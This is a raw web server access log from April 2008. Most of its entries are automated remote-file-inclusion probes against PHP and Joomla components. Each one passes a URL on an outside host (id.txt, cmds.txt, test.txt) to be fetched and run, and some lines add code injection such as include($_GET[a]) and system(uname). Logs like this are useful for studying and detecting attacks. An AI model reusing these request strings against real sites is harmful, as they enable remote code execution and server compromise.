209.126.144.75 - - [08/Apr/2008:11:04:31 -0700] "GET /?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:11:04:32 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geocities.com/s.memek/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.200.113.26 - - [08/Apr/2008:11:05:20 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://borovskr.kaluga.ru/components/com_wraper? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.200.113.26 - - [08/Apr/2008:11:05:20 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://borovskr.kaluga.ru/components/com_wraper? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.61.30.100 - - [08/Apr/2008:11:06:32 -0700] "GET /logs/access_080201.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.30.100 - - [08/Apr/2008:11:06:32 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.30.100 - - [08/Apr/2008:11:06:33 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.36.233.113 - - [08/Apr/2008:11:07:26 -0700] "GET /logs/access_080201.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.36.233.113 - - [08/Apr/2008:11:07:26 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.36.233.113 - - [08/Apr/2008:11:07:26 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.93.240.199 - - [08/Apr/2008:11:07:30 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:11:07:30 -0700] "GET /logs/access_080201.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:11:07:31 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:11:07:31 -0700] "GET /logs/access_080201.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:11:07:31 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:11:07:31 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:11:07:31 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.93.240.199 - - [08/Apr/2008:11:07:31 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:11:07:47 -0700] "GET /logs/access_080127.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/belahan.memek/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:11:07:48 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/belahan.memek/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:11:07:49 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/belahan.memek/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [08/Apr/2008:11:08:26 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/belahan.memek/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:11:08:35 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/com.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:11:08:36 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/com.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:11:08:37 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/com.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:11:08:37 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.priproqua.altervista.org/php5/com.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.108 - - [08/Apr/2008:11:08:39 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.44 - - [08/Apr/2008:11:08:43 -0700] "GET /funny/?S=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.198.149.41 - - [08/Apr/2008:11:09:17 -0700] "GET /logs/access_080113.log//components/com_flyspray/startdown.php?file=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.9.218 - - [08/Apr/2008:11:10:04 -0700] "GET /logs//bitchinindie.com/system/image.php?file=597_shell.php&width=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [08/Apr/2008:11:10:04 -0700] "GET //bitchinindie.com/system/image.php?file=597_shell.php&width=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [08/Apr/2008:11:10:13 -0700] "GET /logs//bitchinindie.com/system/image.php?file=597_shell.php&width=http://h1.ripway.com/castel/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [08/Apr/2008:11:10:13 -0700] "GET //bitchinindie.com/system/image.php?file=597_shell.php&width=http://h1.ripway.com/castel/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.18.207.65 - - [08/Apr/2008:11:11:00 -0700] "GET /logs//bitchinindie.com/system/image.php?file=597_shell.php&width=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [08/Apr/2008:11:11:00 -0700] "GET //bitchinindie.com/system/image.php?file=597_shell.php&width=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:11:11:29 -0700] "GET /logs/access_080201.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:11:11:29 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:11:11:29 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.92.68.25 - - [08/Apr/2008:11:11:47 -0700] "GET /logs//bitchinindie.com/system/image.php?file=597_shell.php&width=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.92.68.25 - - [08/Apr/2008:11:11:47 -0700] "GET //bitchinindie.com/system/image.php?file=597_shell.php&width=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.31 - - [08/Apr/2008:11:12:25 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/?M=A HTTP/1.0" 200 8427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.1.62.200 - - [08/Apr/2008:11:13:27 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [08/Apr/2008:11:13:28 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [08/Apr/2008:11:13:28 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [08/Apr/2008:11:13:30 -0700] "GET /logs/access_080118.log//modules/xfsection/modify.php?dir_module=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [08/Apr/2008:11:13:30 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [08/Apr/2008:11:13:36 -0700] "GET /logs/access_080127.log//modules/xfsection/modify.php?dir_module=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.15.220.158 - - [08/Apr/2008:11:13:47 -0700] "GET /logs//bitchinindie.com/system/image.php?file=597_shell.php&width=http://67.15.84.42/~spencerg/modules/.log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.15.220.158 - - [08/Apr/2008:11:13:48 -0700] "GET //bitchinindie.com/system/image.php?file=597_shell.php&width=http://67.15.84.42/~spencerg/modules/.log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.52.9.218 - - [08/Apr/2008:11:14:10 -0700] "GET /logs/access_080118.log//modules/xfsection/modify.php?dir_module=http://h1.ripway.com/castel/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [08/Apr/2008:11:14:10 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://h1.ripway.com/castel/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [08/Apr/2008:11:14:15 -0700] "GET /logs/access_080127.log//modules/xfsection/modify.php?dir_module=http://h1.ripway.com/castel/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:14:18 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:14:23 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:11:14:27 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://61.129.163.4/on.txt?????? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:11:14:27 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://61.129.163.4/on.txt?????? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:11:16:18 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:11:16:23 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:11:16:24 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:11:16:29 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:11:16:30 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:11:16:35 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:11:16:49 -0700] "GET /logs/index.php?mod=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:11:16:51 -0700] "GET /index.php?mod=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
64.207.204.13 - - [08/Apr/2008:11:17:14 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [08/Apr/2008:11:17:14 -0700] "GET //citywriter/head.php?path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [08/Apr/2008:11:17:14 -0700] "GET /logs//citywriter/head.php?path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [08/Apr/2008:11:17:41 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.129.50 - - [08/Apr/2008:11:17:50 -0700] "GET //index.php?option=frontpage&Itemid=system(uname)http://axovul.iespana.es/socaon.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:11:17:53 -0700] "GET /logs/access_080126.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geocities.com/s.memek/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:11:17:53 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geocities.com/s.memek/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:11:18:42 -0700] "GET /logs/access_080216.log//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:19:22 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:11:19:22 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:11:19:45 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geocities.com/s.memek/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.53.118.196 - - [08/Apr/2008:11:22:06 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.53.118.196 - - [08/Apr/2008:11:22:21 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.53.118.196 - - [08/Apr/2008:11:22:24 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.53.118.196 - - [08/Apr/2008:11:22:25 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:11:22:30 -0700] "GET /logs//bitchinindie.com/system/image.php?file=597_shell.php&width=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:11:22:31 -0700] "GET //bitchinindie.com/system/image.php?file=597_shell.php&width=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.28 - - [08/Apr/2008:11:22:35 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [08/Apr/2008:11:22:35 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [08/Apr/2008:11:22:36 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.216.175.53 - - [08/Apr/2008:11:23:34 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:11:23:35 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:11:23:58 -0700] "GET /logs/access_080112.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
209.200.246.89 - - [08/Apr/2008:11:24:02 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
209.200.246.89 - - [08/Apr/2008:11:24:04 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
89.111.176.28 - - [08/Apr/2008:11:24:06 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:11:24:33 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:11:24:46 -0700] "GET /comments-display-tpl.php?language_file=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.52.146 - - [08/Apr/2008:11:25:42 -0700] "GET /administrator/components/com_jreactions/langset.php?comPath=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
209.85.52.146 - - [08/Apr/2008:11:25:42 -0700] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.6.25.97 - - [08/Apr/2008:11:26:36 -0700] "GET /megumi/Necklace/?N=D HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:11:27:00 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.24.219 - - [08/Apr/2008:11:27:12 -0700] "GET /bikes/dteel/2008_01_27/ HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.136.6.38 - - [08/Apr/2008:11:28:59 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [08/Apr/2008:11:28:59 -0700] "GET //skin/zero_vote/error.php?dir=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [08/Apr/2008:11:29:00 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.31.222 - - [08/Apr/2008:11:29:00 -0700] "GET /logs/access_080130.log HTTP/1.0" 200 667419 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.67.27.193 - - [08/Apr/2008:11:29:50 -0700] "GET /config.php?path_to_root=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
80.67.27.193 - - [08/Apr/2008:11:29:50 -0700] "GET /logs/config.php?path_to_root=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.136.6.38 - - [08/Apr/2008:11:30:23 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:31:50 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:11:31:50 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
209.85.52.146 - - [08/Apr/2008:11:31:56 -0700] "GET /logs/config.php?path_to_root=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
